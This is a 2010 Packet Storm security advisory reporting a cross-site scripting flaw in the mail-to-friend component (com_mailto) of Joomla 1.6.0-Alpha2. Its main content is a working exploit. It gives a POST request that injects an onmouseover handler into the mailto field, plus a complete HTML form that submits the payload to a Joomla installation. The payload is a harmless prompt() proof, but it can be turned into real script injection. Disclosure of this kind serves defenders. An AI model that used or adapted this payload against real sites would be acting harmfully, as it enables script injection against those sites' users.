Joomla 1.6.0-Alpha2 Cross Site Scripting

2010-05-04T00:00:00
ID PACKETSTORM:89147
Type packetstorm
Reporter mega-itec.com
Modified 2010-05-04T00:00:00

Description

                                        
                                            `  
  
# Title:Joomla_1.6.0-Alpha2 XSS Vulnerabilities   
# Date: 2010-05-02  
# Author: mega-itec.com  
# Software Link:  
http://joomlacode.org/gf/download/frsrelease/11322/45252/Joomla_1.6.0-Alpha2-Full-Package.zip  
# Version: 1.6.0-alpha2  
# Tested on: [relevant os]  
# CVE :   
# Code :   
[:::::::::::::::::::::::::::::::::::::: 0x1  
::::::::::::::::::::::::::::::::::::::]  
>> General Information  
Advisory/Exploit Title = Joomla_1.6.0-Alpha2 XSS Vulnerabilities   
Author = mega-itec security team  
Contact = securite@mega-itec.com   
  
[:::::::::::::::::::::::::::::::::::::: 0x2  
::::::::::::::::::::::::::::::::::::::]  
>> Product information  
Name = Joomla  
Vendor = Joomla  
Vendor Website = http://www.joomla.org/  
Affected Version(s) = 1.6.0-Alpha2  
  
  
[:::::::::::::::::::::::::::::::::::::: 0x3  
::::::::::::::::::::::::::::::::::::::]  
>> #1 Vulnerability  
Type = XSS ( POST ) mailto,subject,from,sender   
Example URI =   
option=com_mailto&task=user%2Elogin&32720689cad34365fbe10002f91e50a9=1&mailto=%F6"+onmouseover=prompt(406426661849)//&sender=mega-itec@mega-ite.com&from=mega-itec@mega-ite.com&subject=mega-itec@mega-ite.com&layout=default&tmpl=component&link=encode  
link with base 64  
  
>> #2 html code exploit :   
<form action="http://localhost/Joomla_1.6.0-Alpha2-Full-Package/index.php"  
name="mailtoForm" method="post">  
  
<div style="padding: 10px;">  
<div style="text-align:right">  
<a href="javascript: void window.close()">  
Close Window <img  
src="http://localhost/Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png"  
border="0" alt="" title="" /></a>  
</div>  
  
<h2>  
E-mail this link to a friend. </h2>  
  
<p>  
E-mail to:  
<br />  
<input type="text" name="mailto" class="inputbox" size="25" value="�"  
onmouseover=prompt(406426661849)//"/>  
</p>  
  
<p>  
Sender:  
<br />  
<input type="text" name="sender" class="inputbox"  
value="mega-itec@mega-ite.com" size="25" />  
</p>  
  
<p>  
Your E-mail:  
<br />  
<input type="text" name="from" class="inputbox"  
value="mega-itec@mega-ite.com" size="25" />  
</p>  
  
<p>  
Subject:  
<br />  
<input type="text" name="subject" class="inputbox"  
value="mega-itec@mega-ite.com" size="25" />  
</p>  
  
<p>  
<button class="button" onclick="return submitbutton('send');">  
Send </button>  
<button class="button" onclick="window.close();return false;">  
Cancel </button>  
</p>  
</div>  
  
<input type="hidden" name="layout" value="default" />  
<input type="hidden" name="option" value="com_mailto" />  
<input type="hidden" name="task" value="send" />  
<input type="hidden" name="tmpl" value="component" />  
<input type="hidden" name="link" value="encode you link with base64" />  
<input type="hidden" name="4b42dc29b4b226460d1b510634e21864" value="1"  
/></form>  
  
  
[:::::::::::::::::::::::::::::::::::::: 0x4  
::::::::::::::::::::::::::::::::::::::]  
>> Misc  
mega-itec.com ::: mega-itec security team   
  
  
[:::::::::::::::::::::::::::::::::::::: EOF  
::::::::::::::::::::::::::::::::::::::]  
  
  
  
`